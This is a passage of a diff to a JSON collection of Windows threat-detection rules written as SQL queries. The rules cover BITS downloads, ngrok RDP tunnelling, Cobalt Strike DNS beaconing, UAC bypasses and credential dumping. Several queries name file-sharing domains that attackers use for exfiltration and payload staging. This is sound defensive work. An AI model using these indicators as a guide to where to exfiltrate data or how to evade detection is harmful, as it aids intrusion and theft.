'%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" ], - "filename": "file_event_win_word_template_creation.yml" + "filename": "win_bits_client_new_transfer_via_ip_address.yml" }, { - "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", - "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", - "status": "test", - "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "title": "BITS Transfer Job Download From File Sharing Domains", + "id": "d635249d-86b5-4dad-a8c7-d7272b788586", + "status": "experimental", + "description": "Detects BITS transfer job downloading files from a file sharing domain.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown", - "Possibly some Microsoft Edge upgrades" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" + "filename": "win_bits_client_new_transfer_via_file_sharing_domains.yml" }, { - "title": "Legitimate Application Dropped Executable", - "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", + "title": "Ngrok Usage with Remote Desktop Service", + "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", "status": "experimental", - "description": "Detects programs on a Windows system that should not write executables to disk", - "author": "frack113, Florian Roth", + "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_exe.yml" + "filename": "win_terminalservices_rdp_ngrok.yml" }, { - "title": "Hijack Legit RDP Session to Move Laterally", - "id": "52753ea4-b3a0-4365-910d-36cff487b789", + "title": "CVE-2021-1675 Print Spooler Exploitation", + "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", "status": "test", - "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", - "author": "Samir Bousseaden", + "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1569", + "cve.2021.1675" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" ], - "filename": "file_event_win_tsclient_filewrite_startup.yml" + "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" }, { - "title": "Suspicious ASPX File Drop by Exchange", - "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", + "title": "Code Integrity Attempted DLL Load", + "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", + "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", - "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\assembly\\\\GAC\\\\%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy IN ('1', '2')) OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" ], - "filename": "file_event_win_exchange_webshell_drop.yml" + "filename": "win_codeintegrity_attempted_dll_load.yml" }, { - "title": "File Creation In Suspicious Directory By Msdt.EXE", - "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "title": "Block Load Of Revoked Driver", + "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", + "description": "Detects blocked load attempts of revoked drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "status": "experimental", - "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", - "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001", - "cve.2022.30190" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" ], - "filename": "file_event_win_msdt_susp_directories.yml" + "filename": "win_codeintegrity_revoked_driver.yml" }, { - "title": "Windows Binaries Write Suspicious Extensions", - "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", - "status": "experimental", - "description": "Detects windows executables that writes files with suspicious extensions", + "title": "Code Integrity Blocked Driver Load", + "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", + "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", "author": "Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\'))))" - ], - "filename": "file_event_win_shell_write_susp_files_extensions.yml" - }, - { - "title": "UAC Bypass Using EventVwr", - "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", - "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" ], - "filename": "file_event_win_uac_bypass_eventvwr.yml" + "filename": "win_codeintegrity_blocked_driver_load.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - File", - "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", + "title": "Query Tor Onion Address - DNS Client", + "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_consent_comctl32.yml" + "filename": "win_dns_client_tor_onion.yml" }, { - "title": "Suspicious Creation with Colorcpl", - "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "title": "DNS Query for Ufile.io Upload Domain - DNS Client", + "id": "090ffaad-c01a-4879-850c-6d57da98452d", "status": "experimental", - "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", - "author": "frack113", + "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_colorcpl.yml" + "filename": "win_dns_client_ufile_io.yml" }, { - "title": "Suspicious Interactive PowerShell as SYSTEM", - "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", - "status": "experimental", - "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", + "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ], "falsepositives": [ - "Administrative activity", - "PowerShell scripts running as SYSTEM user" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_system_interactive_powershell.yml" + "filename": "win_dns_client__mal_cobaltstrike.yml" }, { - "title": "SafetyKatz Default Dump Filename", - "id": "e074832a-eada-4fd7-94a1-10642b130e16", + "title": "DNS Query for MEGA.io Upload Domain - DNS Client", + "id": "66474410-b883-415f-9f8d-75345a0a66a6", "status": "test", - "description": "Detects default lsass dump filename from SafetyKatz", - "author": "Markus Neis", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Rare legitimate files with similar filename structure" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "file_event_win_hktl_safetykatz.yml" + "filename": "win_dns_client_mega_nz.yml" }, { - "title": "Suspicious Executable File Creation", - "id": "74babdd6-a758-4549-9632-26535279e654", + "title": "DNS Query for Anonfiles.com Domain - DNS Client", + "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", "status": "experimental", - "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", - "author": "frack113", + "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Rare legitimate access to anonfiles.com" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_executable_creation.yml" + "filename": "win_dns_client_anonymfiles_com.yml" }, { - "title": "Pingback Backdoor File Indicators", - "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Suspicious AppX Package Locations", + "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" ], - "filename": "file_event_win_malware_pingback_backdoor.yml" + "filename": "win_appxdeployment_server_susp_package_locations.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - File", - "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Remote AppX Package Locations", + "id": "8b48ad89-10d8-4382-a546-50588c410f0d", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_winsat.yml" + "filename": "win_appxdeployment_server_susp_domains.yml" }, { - "title": "Suspicious Word Cab File Write CVE-2021-40444", - "id": 